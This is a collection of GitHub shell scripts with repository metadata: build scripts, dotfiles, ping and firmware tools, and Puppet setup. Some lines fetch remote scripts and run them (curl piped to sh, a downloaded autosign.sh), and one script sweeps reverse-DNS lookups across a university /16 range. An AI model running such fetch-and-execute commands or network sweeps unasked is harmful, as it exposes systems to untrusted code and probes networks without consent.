c2922b370026e3b61305657dffe6251b1b6a2329
|
Shell
|
pro-gramma/cisc220_2
|
/queensuComputingSubdomainFinder.sh
|
UTF-8
| 271
| 2.9375
| 3
|
[] |
no_license
|
#!bin/bash
#James Neverson 10193581
echo -e "IP Address\tSub-Domain"
for ((i=0;i<=255;i++));do
for ((ii=0;ii<=255;ii++));do
output=($(nslookup 130.15.${i}.${ii}))
if [[ "${output[9]}" == *"cs.queensu.ca." ]];then
echo -e "130.15.${i}.${ii}\t${output[9]}"
fi
done
done
| true
|
40b3112ba894d02f3db627780ec4cecd618754ba
|
Shell
|
termux/termux-packages
|
/packages/rhash/build.sh
|
UTF-8
| 1,438
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
TERMUX_PKG_HOMEPAGE=https://github.com/rhash/RHash
TERMUX_PKG_DESCRIPTION="Console utility for calculation and verification of magnet links and a wide range of hash sums"
TERMUX_PKG_LICENSE="MIT"
TERMUX_PKG_MAINTAINER="@termux"
TERMUX_PKG_VERSION=1.4.4
TERMUX_PKG_SRCURL=https://github.com/rhash/RHash/archive/v$TERMUX_PKG_VERSION.tar.gz
TERMUX_PKG_SHA256=8e7d1a8ccac0143c8fe9b68ebac67d485df119ea17a613f4038cda52f84ef52a
TERMUX_PKG_AUTO_UPDATE=true
TERMUX_PKG_DEPENDS="openssl"
TERMUX_PKG_CONFLICTS="librhash, rhash-dev"
TERMUX_PKG_REPLACES="librhash, rhash-dev"
TERMUX_PKG_BUILD_IN_SRC=true
termux_step_configure() {
CFLAGS="-DOPENSSL_RUNTIME -DSYSCONFDIR=\"${TERMUX_PREFIX}/etc\" $CPPFLAGS $CFLAGS"
./configure \
--prefix=$TERMUX_PREFIX \
--disable-static \
--enable-lib-static \
--enable-lib-shared \
--cc=$CC
}
termux_step_make() {
make -j $TERMUX_MAKE_PROCESSES \
ADDCFLAGS="$CFLAGS" \
ADDLDFLAGS="$LDFLAGS"
}
termux_step_make_install() {
make install install-pkg-config
make -C librhash install-lib-headers
ln -sf $TERMUX_PREFIX/lib/librhash.so.1 $TERMUX_PREFIX/lib/librhash.so
}
termux_step_post_massage() {
# Do not forget to bump revision of reverse dependencies and rebuild them
# after SOVERSION is changed.
local _SOVERSION_GUARD_FILES="lib/librhash.so.1"
local f
for f in ${_SOVERSION_GUARD_FILES}; do
if [ ! -e "${f}" ]; then
termux_error_exit "SOVERSION guard check failed."
fi
done
}
| true
|
ab86fb5a9f6b3c6249ba658f11a80a672b5a87f3
|
Shell
|
petronny/aur3-mirror
|
/kf5-akonadi/PKGBUILD
|
UTF-8
| 932
| 2.71875
| 3
|
[] |
no_license
|
# Maintainer: Andrea Scarpino <andrea@archlinux.org>
pkgname=kf5-akonadi
pkgver=1.12.1
pkgrel=1
pkgdesc="PIM layer, which provides an asynchronous API to access all kind of PIM data"
arch=('i686' 'x86_64')
url='http://community.kde.org/KDE_PIM/Akonadi'
license=('LGPL')
depends=('shared-mime-info' 'boost-libs' 'mariadb' 'qt5-base' 'libxslt')
makedepends=('cmake' 'boost' 'postgresql')
optdepends=('postgresql: PostgreSQL backend')
install="${pkgname}.install"
conflicts=('akonadi-qt5')
source=("http://download.kde.org/stable/akonadi/src/akonadi-${pkgver}.tar.bz2")
md5sums=('9a4a99d10e003a267a515fc60de4f817')
prepare() {
mkdir build
}
build() {
cd build
cmake ../akonadi-${pkgver} \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=/opt/kf5 \
-DINSTALL_QSQLITE_IN_QT_PREFIX=TRUE \
-DAKONADI_BUILD_TESTS=OFF \
-DQT5_BUILD=ON \
-DWITH_SOPRANO=OFF
make
}
package() {
cd build
make DESTDIR="${pkgdir}" install
}
| true
|
57698ff0d5736ce927af0c080d64ce3ea1f8f0d0
|
Shell
|
fastZhe/common
|
/linux/losePacket/losePacket.sh
|
UTF-8
| 1,109
| 3.71875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#set -x
. ./log.sh
basepath=$(cd `dirname $0`;pwd)
baselevel=100
ips=$1
if [ -z "$ips" ];then
echo [use $0 ipfile or $0 ipfile [50]] ;
exit 1
fi
if [ ! -z "$2" ];then
baselevel=$2
fi
echo >./failture_ip.txt
echo >./success_ip.txt
############################################################
##########ping tools #################################
############################################################
function pingFun(){
file=$1
while read ip
do
log info $ip
log info "cmd : ping -c 100 -i 0 $ip | grep 'packet loss' | awk -F \",\" '{print }' | awk '{print $1}' "
rate=`ping -c 100 -i 0 $ip | grep 'packet loss' | awk -F "," '{print $(NF-1)}' | awk '{print $1}'`
rate=${rate%\%*}
log info $rate
if [ "$rate" -ge "$baselevel" ];then
log error "$ip lose packet $rate%"
echo "$ip\n" >>./failture_ip.txt
else
echo "$ip\n" >>./success_ip.txt
fi
done < $file
}
# start ping .......
pingFun $basepath/$ips
| true
|
2e2372dff5a3dd220e76ad221233e03b021fb52e
|
Shell
|
lbflyseed/build
|
/mk-spinor-fw.sh
|
UTF-8
| 4,115
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash -e
if [ ! $_TARGET_CHIP ] ; then
echo "source build/envsetup.sh firstly"
exit -1
fi
img_name=${_TARGET_PLATFORM}-${_TARGET_OS}-${_TARGET_BOARD}-spinor.img
source build/setting.mk
pack_dir=${TOOLS_DIR}/pack
pack_tools_dir=${pack_dir}/pctools/linux
board_out_dir=${OUT_DIR}/${_TARGET_PLATFORM}/${_TARGET_BOARD}
pack_out_dir=${board_out_dir}/pack
plat_dir=$DEVICE_DIR/$_TARGET_PLATFORM
export PATH=${pack_tools_dir}/mod_update:${pack_tools_dir}/openssl:${pack_tools_dir}/eDragonEx:${pack_tools_dir}/fsbuild200:${pack_tools_dir}/android:$PATH
tools_file_list=(
common/tools/split_xxxx.fex
common/tools/usbtool_test.fex
common/tools/cardscript.fex
common/tools/cardscript_secure.fex
common/tools/cardtool.fex
common/tools/usbtool.fex
common/tools/aultls32.fex
common/tools/aultools.fex
)
configs_file_list=(
common/toc/toc1.fex
common/toc/toc0.fex
common/toc/boot_package.fex
common/dtb/sunxi.fex
common/hdcp/esm.fex
)
boot_file_list=(
bootloader/boot0_nand.bin:${pack_out_dir}/boot0_nand.fex
bootloader/boot0_sdcard.bin:${pack_out_dir}/boot0_sdcard.fex
bootloader/boot0_spinor.bin:${pack_out_dir}/boot0_spinor.fex
bootloader/fes1.bin:${pack_out_dir}/fes1.fex
bootloader/u-boot.bin:${pack_out_dir}/u-boot.fex
bootloader/u-boot-spinor.bin:${pack_out_dir}/u-boot-spinor.fex
bootloader/cpus_pm_binary.code:${pack_out_dir}/cpus_pm_binary.code
bootloader/scp.bin:${pack_out_dir}/scp.fex
bootloader/sboot.bin:${pack_out_dir}/sboot.fex
bootloader/boot_logo.fex:${pack_out_dir}/boot_logo.fex
)
function do_prepare()
{
rm -rf $pack_out_dir
mkdir -p $pack_out_dir
printf "copying tools file\n"
for file in ${tools_file_list[@]} ; do
cp -f $pack_dir/$file $pack_out_dir > /dev/null
done
printf "copying configs file\n"
for file in ${configs_file_list[@]} ; do
cp -f $pack_dir/$file $pack_out_dir > /dev/null
done
cp -rf $plat_dir/configs/* $pack_out_dir
printf "copying bootloader\n"
for file in ${boot_file_list[@]} ; do
cp -f $plat_dir/`echo $file | awk -F':' '{print $1}'` \
`echo $file | awk -F':' '{print $2}'`
done
cp -rf $plat_dir/bootloader/boot-res $pack_out_dir
cp -rf $plat_dir/bootloader/boot-res.ini $pack_out_dir
cp -rf $plat_dir/boards/$_TARGET_BOARD/configs/* $pack_out_dir
pushd $pack_out_dir > /dev/null
printf "parsing sys_config.fex\n"
busybox unix2dos sys_config.fex
script sys_config.fex > /dev/null
cp -f sys_config.bin config.fex
printf "update nor bootloader\n"
update_boot0 boot0_spinor.fex sys_config.bin SDMMC_CARD > /dev/null
update_uboot u-boot-spinor.fex sys_config.bin > /dev/null
printf "update nand and sdcard bootloader\n"
update_boot0 boot0_nand.fex sys_config.bin NAND > /dev/null
update_boot0 boot0_sdcard.fex sys_config.bin SDMMC_CARD > /dev/null
update_uboot u-boot.fex sys_config.bin > /dev/null
update_fes1 fes1.fex sys_config.bin > /dev/null
# Uncomment if using FAT filesystem at boot resource partition
printf "generating boot-res.fex\n"
fsbuild boot-res.ini split_xxxx.fex > /dev/null
printf "generating env.fex\n"
u_boot_env_gen env.cfg env.fex > /dev/null
ln -sf ${board_out_dir}/kernel/uImage kernel.fex
ln -sf ${board_out_dir}/rootfs.squashfs rootfs.fex
printf "parsing sys_partition_spinor.fex\n"
busybox unix2dos sys_partition_spinor.fex
script sys_partition_spinor.fex > /dev/null
printf "generating sunxi-mbr for spinor\n"
cp sys_partition_spinor.bin sys_partition.bin
update_mbr sys_partition.bin 1 > /dev/null
printf "generating full_img.fex\n"
merge_package full_img.fex \
boot0_spinor.fex \
u-boot-spinor.fex \
sunxi_mbr.fex \
sys_partition.bin > /dev/null
ln -sf ${board_out_dir}/kernel/vmlinux.tar.bz2 vmlinux.fex
popd > /dev/null
}
function do_pack()
{
echo "imagename = $img_name" >> $pack_out_dir/image_spinor.cfg
echo "" >> $pack_out_dir/image_spinor.cfg
pushd $pack_out_dir > /dev/null
dragon image_spinor.cfg sys_partition_spinor.fex
if [ $? -eq 0 -a -e $img_name ] ; then
mv $img_name ../
echo '-------- image is at --------'
echo -e '\033[0;31;1m'
echo ${board_out_dir}/${img_name}
echo -e '\033[0m'
fi
popd > /dev/null
}
do_prepare
do_pack
| true
|
044e43adecb32b80189f48d2ce4ae42e8b494493
|
Shell
|
zoojar/tf-puppet
|
/scripts/configure_autosigning_foss.sh
|
UTF-8
| 684
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# Script to configure autosigning on PE 2016.5.1. Accepts one argument: the PSK - written into /etc/puppetlabs/puppet/global-psk.
psk=$1
autosign_exe_url="https://raw.githubusercontent.com/zoojar/classified/master/autosign.sh"
echo "Configuring policy-based autosigning..."
echo $psk >/etc/puppetlabs/puppet/global-psk
curl -L "${autosign_exe_url}" > /etc/puppetlabs/puppet/autosign.sh
chmod 500 /etc/puppetlabs/puppet/autosign.sh ; sudo chown puppet /etc/puppetlabs/puppet/autosign.sh
PATH="/opt/puppetlabs/bin:/opt/puppetlabs/puppet/bin:/opt/puppet/bin:$PATH"
puppet config set autosign /etc/puppetlabs/puppet/autosign.sh --section master
service puppetserver restart
| true
|
ffd05b6bceec2342651b161d87748d6c1b35a8c8
|
Shell
|
Zuko/mumble-releng
|
/buildenv/win32-static/build-bzip2.bash
|
UTF-8
| 449
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash -ex
source common.bash
fetch_if_not_exists "http://www.bzip.org/1.0.6/bzip2-1.0.6.tar.gz"
expect_sha1 "bzip2-1.0.6.tar.gz" "3f89f861209ce81a6bab1fd1998c0ef311712002"
tar -zxf bzip2-1.0.6.tar.gz
cd bzip2-1.0.6
patch -p1 < ${MUMBLE_BUILDENV_ROOT}/patches/bzip2-linker-pdb.patch
cmd /c nmake /f makefile.msc
mkdir -p ${MUMBLE_PREFIX}/bzip2/{include,lib}
cp libbz2.lib ${MUMBLE_PREFIX}/bzip2/lib/
cp bzlib.h ${MUMBLE_PREFIX}/bzip2/include/
| true
|
5860349d15083b24b4a41705be8e3513d56fe37a
|
Shell
|
maxrd2/arch-repo
|
/packages/mingw-libs/mingw-w64-docbook-wrapper/PKGBUILD
|
UTF-8
| 441
| 2.9375
| 3
|
[] |
no_license
|
_pkgname=docbook-wrapper
pkgname=mingw-w64-$_pkgname
pkgver=1.0
pkgrel=1
arch=(any)
pkgdesc="Symlink system docbook-* packages (mingw-w64)"
license=(custom)
url='https://docbook.org/'
_architectures="i686-w64-mingw32 x86_64-w64-mingw32"
package() {
for _arch in ${_architectures}; do
install -d "$pkgdir/usr/${_arch}/share/xml"
ln -s "/usr/share/xml/docbook" "$pkgdir/usr/${_arch}/share/xml/docbook"
done
}
# vim:set sw=2 et:
| true
|
7e206cac31badc0683c9843696e7e74bcf93151e
|
Shell
|
iainthegray/vault-dr-vagrant
|
/consul_config_1.5.sh
|
UTF-8
| 2,118
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
readonly DEFAULT_INSTALL_PATH="/usr/local/bin/consul"
readonly DEFAULT_CONSUL_USER="consul"
readonly DEFAULT_CONSUL_PATH="/etc/consul.d"
readonly DEFAULT_CONSUL_OPT="/opt/consul-storage/"
readonly DEFAULT_CONSUL_CONFIG="consul.hcl"
readonly DEFAULT_CONSUL_SERVICE="/etc/systemd/system/consul.service"
readonly DEFAULT_CONSUL_SERVICE_NAME="consul"
readonly SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
readonly TMP_DIR="/tmp/install"
readonly TMP_ZIP="consul.zip"
readonly SCRIPT_NAME="$(basename "$0")"
# Set the Script variables
# One of
readonly CONSUL_BIN=""
readonly CLUSTER_SIZ="1"
readonly CONSUL_CLIENT="0"
CONSUL_ADDR="http://127.0.0.1:8500"
# Strip acl config
echo "Add ACL Config"
cat << EOF >> ${DEFAULT_CONSUL_PATH}/${DEFAULT_CONSUL_CONFIG}
primary_datacenter = "dc1"
acl {
enabled = true
default_policy = "deny"
down_policy = "extend-cache"
}
EOF
# Restart Consul
echo "restart Consul"
sudo systemctl stop consul
sleep 5
sudo systemctl start consul
sleep 5
CONSUL_TOKEN=`curl --request PUT ${CONSUL_ADDR}/v1/acl/bootstrap |cut -d'"' -f4`
echo "CONSUL_TOKEN == ${CONSUL_TOKEN}"
AT=`curl --request PUT --header "X-Consul-Token: ${CONSUL_TOKEN}" --data '{"Name": "Agent Token", "Type": "client", "Rules": "node \"\" { policy = \"write\" } service \"\" { policy = \"read\" }"}' ${CONSUL_ADDR}/v1/acl/create | cut -d'"' -f4`
echo "AGENT TOKEN == ${AT}"
echo "Add agent token"
sed -i'' -Ez "s/(down_policy = \"extend-cache\"\n\s*)\}/\1 tokens \{\n agent = \"${AT}\"\n \}\n\}/g" ${DEFAULT_CONSUL_PATH}/${DEFAULT_CONSUL_CONFIG}
sudo systemctl stop consul
sleep 5
sudo systemctl start consul
sleep 5
echo "GET VAULT TOKEN"
VT=`curl --request PUT --header "X-Consul-Token: ${CONSUL_TOKEN}" --data '{"Name": "Vault Token", "Type": "client", "Rules": "node \"\" { policy = \"write\" } service \"vault\" { policy = \"write\" } agent \"\" { policy = \"write\" } key \"vault\" { policy = \"write\" } session \"\" { policy = \"write\" } "}' ${CONSUL_ADDR}/v1/acl/create | cut -d'"' -f4`
echo "VT == ${VT}"
# sudo sed -i'' "s/{{ vault_token }}/${at}/" /etc/vault.d/vault.hcl
| true
|
8d613770b47e1777ebfcd853b1273dbe25d05f8d
|
Shell
|
shimajima-eiji/Chocolatey
|
/wsl/git/update_clones.sh
|
UTF-8
| 1,755
| 3.8125
| 4
|
[] |
no_license
|
#!/bin/sh
<<README
CHANGELOG.mdを自動更新した時に、開発で使っている環境も更新してほしい時に自動化させる
誤作動防止のため、引数をフルパスで設定する必要がある。
# 使い方
curl https://raw.githubusercontent.com/shimajima-eiji/Chocolatey/master/wsl/git/update_clones.sh 2>/dev/null | sh -s -- ディレクトリ名1 ディレクトリ名2...
## 応用
git pullしたいパスの数だけ実施させることができるので、findコマンドで引数を与えてやるのが良い
sh -s -- $(find $(wslpath "your path") -type d -not -path "*/node_modules/*" -not -path "*/.*/*")
※不正実行防止のため、ドルマークは全角にしている。そのため、コピペ時はドルマークを半角にすること
README
debug=false
output() {
if [ "$1" = "true" ]; then
echo "$2"
fi
}
pathes=$@
for path in ${pathes}; do
if [ ! "$(echo ${path} | cut -c1)" = "/" ]; then
output ${debug} "[SKIP] 誤作動を防止するため、入力はフルパスで設定すること: ${path}"
continue
elif [ ! -d "${path}" ]; then
output ${debug} "[SKIP] 指定されたパスはディレクトリではない: ${path}"
continue
fi
cd ${path}
if [ ! -d "${path}/.git" ]; then
output ${debug} "[SKIP] リポジトリのルートディレクトリではない: ${path}"
continue
fi
git branch >/dev/null 2>&1
if [ ! $? = 0 ]; then
output ${debug} "[SKIP] 指定されたパスはcloneされたディレクトリではない: ${path}"
continue
fi
cd $(git rev-parse --show-toplevel)
git.exe pull --progress -v --no-rebase "origin" # gitだとダメらしく、TortoiseGitで上手く行ったのでexeを採用
done
| true
|
2ec661c6a0997fab148762cad7c1439f21e584c4
|
Shell
|
BoobooWei/booboo_redis
|
/shellscripts/redisctlnew.sh
|
UTF-8
| 713
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
#Usage: redisctl start|stop|status
# 同时启动多实例
start_redis(){
for i in `seq 6379 6478`
do /usr/local/redis-3.0.7/src/redis-server /data/redis/conf/redis${i}.conf &
done
}
# 查看所有实例的守护进程
status_redis(){
count=`ps -ef|grep "redis-server" | grep -v 'grep'|wc -l`
if [ $count == 100 ] ;then echo redis server is running ;else echo redis server is not running;fi
}
# 停止所有实例
stop_redis(){
for i in `ps -ef|grep "redis-server" | grep -v 'grep' | awk '{print $2}'`
do
kill -9 $i
done
}
case $1 in
start)
start_redis;;
status)
status_redis;;
stop)
stop_redis;;
restart)
stop_redis;
start_redis;;
*)
echo "Usage: redisctl start|stop|status|restart"
esac
| true
|
b8976210e770afd21d139ab4724dc42768db947e
|
Shell
|
jonprindiville/pepo
|
/push-gh-pages.sh
|
UTF-8
| 770
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -x
#
# push-gh-pages.sh
#
# What?
# - helps update https://jonprindiville.github.io/pepo/ by pushing new
# index.html to the gh-pages branch
#
# How?
# - develop develop develop, commit, push new pepo.elm to master branch
# - ./push-gh-pages.sh
# - was there a new "Autoupdate" commit created in gh-pages branch?
# - yes? push it, now it's published
# - no? maybe you didn't actually change stuff, or elm-make barfed, or your
# network connection flaked, or ...
TMP_DIR="$(mktemp -d)";
TMP_INDEX="$TMP_DIR/index.html";
elm-make pepo.elm && \
mv index.html "$TMP_INDEX" && \
git checkout gh-pages && \
mv "$TMP_INDEX" . && \
git add index.html && \
git commit -m "Autoupdate index.html for gh-pages" && \
rmdir "$TMP_DIR";
| true
|
a48ec859cdf6278730dd185618b52a2f1c527936
|
Shell
|
pedromundo/tesseroids
|
/cookbook/tess2prism/tess2prism.sh
|
UTF-8
| 697
| 2.859375
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Generate a prism model from a tesseroid model.
# Prisms will have the same mass as the tesseroids and
# associated spherical coordinates of the center of
# the top of the tesseroid.
tess2prism < tess-model.txt > prism-model.txt
# Generate a regular grid in spherical coordinates,
# pipe the grid to the computation programs,
# and dump the result on output.txt
# prismpots calculates the potential in spherical
# coordinates, prismgs calculates the full
# gravity vector, and prismggts calculates the full
# gravity gradient tensor.
tessgrd -r-160/0/-80/0 -b100/100 -z250e03 | \
prismpots prism-model.txt | \
prismgs prism-model.txt | \
prismggts prism-model.txt -v > output.txt
| true
|
c4b6acb5ee06751ad26a24397515ffe8c5131bb5
|
Shell
|
michaelficarra/dotfiles
|
/bashrc
|
UTF-8
| 1,865
| 3
| 3
|
[] |
no_license
|
set -o vi
export PATH=$HOME/bin:$HOME/.local/bin:/sbin:/usr/sbin:$PATH
export TERM=xterm-256color
export GREP_OPTIONS='--color=auto'
if [ $(id -u) -eq 0 ]; then
UIDENT="#"
else
UIDENT="$"
fi
export PROMPT_COMMAND='PS1="[\u@\h \w]`
if [[ \$? = "0" ]];
then echo "\\[\\033[0;32m\\]";
else echo "\\[\\033[0;31m\\]";
fi` $UIDENT\[\e[m\] "'
export PS1
alias gitdf='git diff --color'
alias gitst='git status'
alias gitlg="git log --graph --pretty=format:'%C(bold yellow)%h%Creset \
-%C(bold red)%d%Creset %s %C(bold green)(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit"
alias sl='dmesg | egrep --color "ttyUSB|ttyACM|ttyAMA"'
alias sr='resize && reset'
alias ls='ls --color'
alias ll='ls -alh'
alias webs='python -m SimpleHTTPServer'
alias please=sudo
alias fuck='sudo $(history -p \!\!)'
alias ..='cd ../../'
alias ...='cd ../../../'
alias ....='cd ../../../../'
alias .....='cd ../../../../../'
alias ......='cd ../../../../../../'
alias v=vagrant
# powerline prompt
#if [ -f ~/.local/lib/python2.7/site-packages/powerline/bindings/bash/powerline.sh ]; then
# source ~/.local/lib/python2.7/site-packages/powerline/bindings/bash/powerline.sh
#fi
function f()
{
grep -ri ${1} .
}
function pdfsplit()
{
if [ $# -eq 3 ]; then
gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -dSAFER \
-dFirstPage=${2} \
-dLastPage=${3} \
-sOutputFile="${1%.pdf}_p${2}-p${3}.pdf" \
"${1}"
else
echo "usage: pdfsplit <source-file> <first-page> <last-page>"
fi
}
function pdfjoin()
{
if [ $# -ge 3 ]; then
gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -sOutputFile="${1}" "${2}" "${3}" \
"${4}" "${5}" "${6}" "${7}" "${8}" "${9}" "${10}" "${11}" "${12}" "${13}"
else
echo "usage: pdfjoin <merged-file> <first-pdf> <...> <last-pdf>"
fi
}
export GOROOT=$HOME/pkg/go
export PATH=$PATH:$GOROOT/bin
export PATH="$PATH:$HOME/.rvm/bin"
. /opt/erlang/activate
| true
|
61b1d334ef5642dae8676296371b069f2529439a
|
Shell
|
ychenut/qiandao
|
/update.sh
|
UTF-8
| 240
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
cd /usr/src/app
git fetch --all
git reset --hard origin/master
git pull
if [ $AUTO_RELOAD ] && [ "$AUTO_RELOAD" == "False" ];then
echo "Info: 请手动重启容器,或设置环境变量AUTO_RELOAD以开启热更新功能"
fi
| true
|
6c17469a9b08e4ff6c3c9c28dfa61bbe510a4467
|
Shell
|
talent518/utils
|
/pstore.sh
|
UTF-8
| 768
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/sh
set -e
if [ ${1:-0} -gt 0 ]; then
sleep $1
fi
mount -t pstore pstore /sys/fs/pstore
dmpDir=/var/pstore
dmpLog=$dmpDir/sh.log
files=$(find /sys/fs/pstore -name "*-ramoops-*" | xargs -n 100 echo)
mkdir -p $dmpDir
if [ ${#files} -eq 0 ]; then
echo "Not found file" >> $dmpLog
exit 0
fi
echo "Found files: '$files'" >> $dmpLog
curIdFile=$dmpDir/cur.id
if [ -f "$curIdFile" ]; then
curId=$(cat $curIdFile)
else
curId=0
fi
curDir="$(printf "%02d" $curId)-$(date +%Y%m%d-%H%M%S)"
nextId=$(expr $curId + 1)
if [ $nextId -gt 30 ]; then
nextId=0
fi
echo $nextId > $dmpDir/cur.id
busybox rm -vrf $dmpDir/$(printf "%02d" $nextId)-* 2>&1 >> $dmpLog
echo "Move..." >> $dmpLog
mkdir -p $dmpDir/$curDir
busybox mv -v $files $dmpDir/$curDir 2>&1 >> $dmpLog
| true
|
12d7fcdcf8ee89d86181054cbbea363727cbe31d
|
Shell
|
BenJule/cm_build_scripts
|
/repo_sync_cm14
|
UTF-8
| 1,778
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
# Path to root of CM project directory
CM_PROJECT_DIR=~/workspace/CM14.1-Nightly
CM_DEVICE=~/workspace/CM14.1-Nightly/device/samsung/jfltexx
CM_KERNEL=~/workspace/CM14.1-Nightly/kernel/samsung/jf
CM_VENDOR=~/workspace/CM14.1-Nightly/vendor/samsung
CM_QCOM=~/workspace/CM14.1-Nightly/vendor/qcom/binaries
CM_TWRP=~/workspace/CM14.1-Nightly/bootable/recovery-twrp
CM_BUSYBOX=~/workspace/CM14.1-Nightly/external/busybox
## End Edit
cd "$CM_PROJECT_DIR"
if [ -e "../../patches/build.name.cm14.diff" ]; then
patch -R -p1 --no-backup-if-mismatch < ../../patches/build.name.cm14.diff
fi
repo sync --no-clone-bundle
#repo sync --force-sync --no-clone-bundle -c
if [ -e "../../patches/build.name.cm14.diff" ]; then
echo "Setting build name to NIGHTLY"
patch -p1 --no-backup-if-mismatch < ../../patches/build.name.cm14.diff
fi
echo ""
if [ -d "$CM_DEVICE" ]; then
cd "$CM_DEVICE"
echo "Rebasing device repo."
git checkout cm-14.1
git fetch github
git rebase github/cm-14.1
echo ""
fi
if [ -d "$CM_KERNEL" ]; then
cd "$CM_KERNEL"
echo "Rebasing kernel repo."
git checkout cm-14.1
git fetch github
git rebase github/cm-14.1
echo ""
fi
if [ -d "$CM_VENDOR" ]; then
cd "$CM_VENDOR"
echo "Rebasing vendor repo."
git checkout cm-14.1
git fetch github
git rebase github/cm-14.1
echo ""
fi
if [ -d "$CM_QCOM" ]; then
cd "$CM_QCOM"
echo "Rebasing qcom repo."
git checkout cm-14.1
git fetch github
git rebase github/cm-14.1
echo ""
fi
if [ -d "$CM_TWRP" ]; then
cd "$CM_TWRP"
echo "Update twrp repo."
git checkout android-7.1
git fetch github
git rebase github/android-7.1
fi
if [ -d "$CM_BUSYBOX" ]; then
cd "$CM_BUSYBOX"
git checkout cm-14.1
git fetch github
git rebase github/cm-14.1
echo ""
fi
| true
|
0bba37397aaec920b4ce245104cdaa2ed956321a
|
Shell
|
masak/tilde-bin
|
/git-wip
|
UTF-8
| 269
| 2.828125
| 3
|
[] |
no_license
|
#! /bin/bash
BRANCH_NAME=`git symbolic-ref --short HEAD`
git checkout -q -b "$BRANCH_NAME-wip" &&
git add -A &&
git commit -q -m'wip' &&
git checkout -q "$BRANCH_NAME"
SHA=`git rev-parse --short $BRANCH_NAME-wip`
echo "Stashed to $BRANCH_NAME-wip ($SHA)"
| true
|
7a03b5a79e7584deaf401a904fce74bd4fb95ddf
|
Shell
|
eliasnorrby/dotfiles
|
/wm/bspwm/bspwmrc
|
UTF-8
| 2,140
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh
_is_callable () {
command -v "$1" >/dev/null || return 1
}
if ! _is_callable sxhkd ; then
echo "sxhkd not found : exiting"
bspc quit
exit 1
fi
xrandr --output DP-1 --auto --primary --output DVI-D-0 --auto --right-of DP-1 --output DVI-I-1 --auto --left-of DP-1
bspc monitor DVI-I-1 -d A1 A2 A3 A4 A5 A6 A7
bspc monitor DP-1 -d 1 2 3 4 5 6 7 8 9 10
bspc monitor DVI-D-0 -d B1 B2 B3 B4 B5 B6 B7
bspc config border_width 2
bspc config window_gap 10
bspc config focused_border_color "#ffcb6b"
bspc config split_ratio 0.50
bspc config borderless_monocle false
bspc config gapless_monocle false
bspc rule -a TmuxAlacritty desktop='1' follow=on
bspc rule -a Google-chrome desktop='2' follow=on
bspc rule -a jetbrains-idea-ce desktop='3' follow=on
bspc rule -a Emacs desktop='4' state=fullscreen follow=on
bspc rule -a TaskAlacritty desktop='A1' follow=on
bspc rule -a Todoist desktop='A1' follow=on
bspc rule -a Sunsama desktop='A1' follow=on
bspc rule -a "Microsoft Teams - Preview" desktop='A2' follow=on # (*)
bspc rule -a Chromium desktop='A2' follow=on
bspc rule -a firefox desktop='A3' follow=on
bspc rule -a postman desktop='A4' follow=on # (*)
bspc rule -a Slack desktop='B1' follow=on
bspc rule -a Spotify desktop='B2' # (*)
bspc rule -a Discord desktop='B3' follow=on state=fullscreen # (*)
bspc rule -a 1Password desktop='B4' follow=on
bspc rule -a VpnSession state=floating
bspc rule -a NotesAlacritty state=floating center=true rectangle=1600x1000+0+0
# (*)
# Rules don't work for electron apps - see:
# https://github.com/baskerville/bspwm/issues/291#issuecomment-145329416
# Check wm/bspwm/launch_on_desktop.sh for a workaround
_run_if_present() {
case $1 in
"/"*) script="$1" ;;
*) script="${HOME}/.config/$1" ;;
esac
[ -x "$script" ] && shift && "$script" "$@"
}
_run_if_present feh/set-background.sh ~/.wallpaper
_run_if_present polybar/launch.sh
_run_if_present picom/launch.sh
_run_if_present dunst/launch.sh
_run_if_present xkb/setup-keybindings.sh
_run_if_present arch/xinput.sh
_run_if_present sxhkd/launch.sh
_run_if_present arch/autostart.sh
| true
|
d19a426d5e8acb7203fe490585cd1d714b6a59c0
|
Shell
|
skuapso/skuapso
|
/start
|
UTF-8
| 265
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
if [ -z $SKUAPSO_CONFIG_DIR ]; then
SKUAPSO_CONFIG_DIR="./etc"
fi
CONFIG=""
for i in $(ls $SKUAPSO_CONFIG_DIR/*.config); do
CONFIG="$CONFIG -config $i"
done
echo "$CONFIG"
erl -pa ebin -pa lib/*/ebin $CONFIG -args_file $SKUAPSO_CONFIG_DIR/vm.args
| true
|
d4de1213a2860558fd8c3d44697d948dfb13153a
|
Shell
|
nnh/utm_management
|
/programs/grep.sh
|
UTF-8
| 208
| 3.078125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
DATA=`cat macAddr.txt`
while read line
do
temp=`echo ${line//:/}`
temp2=`echo ${temp:0:6}-${temp:6:12}`
echo $temp2
grep $temp2 ../macAddressList/*.txt > $temp2.txt
done << FILE
$DATA
FILE
| true
|
2d95c9b92d3cd57eb6752ccc6c5bb6598553bfa3
|
Shell
|
evicinelli/Dotfiles
|
/.config/argos/2.bluetooth-devices.5m+.sh
|
UTF-8
| 1,240
| 3.390625
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
IFS=$'\n'
printmono(){
for line in $*; do
echo "$line | font=Monospace color=gray"
done
}
powered="$(bluetoothctl show | grep Powered | sed "s,\tPowered: ,,")"
[[ $powered == "yes" ]] && color="white" || color="gray"
[[ $(bluetoothctl info | grep "Paired" | awk -F': ' '{print $2}') == "yes" ]] && label="∙B∙" || label="B"
echo "$label | color=$color refresh=true"
if [[ $ARGOS_MENU_OPEN == "true" ]]; then
echo "---"
# devices=($(bluetoothctl paired-devices | cut -d' ' -f3-))
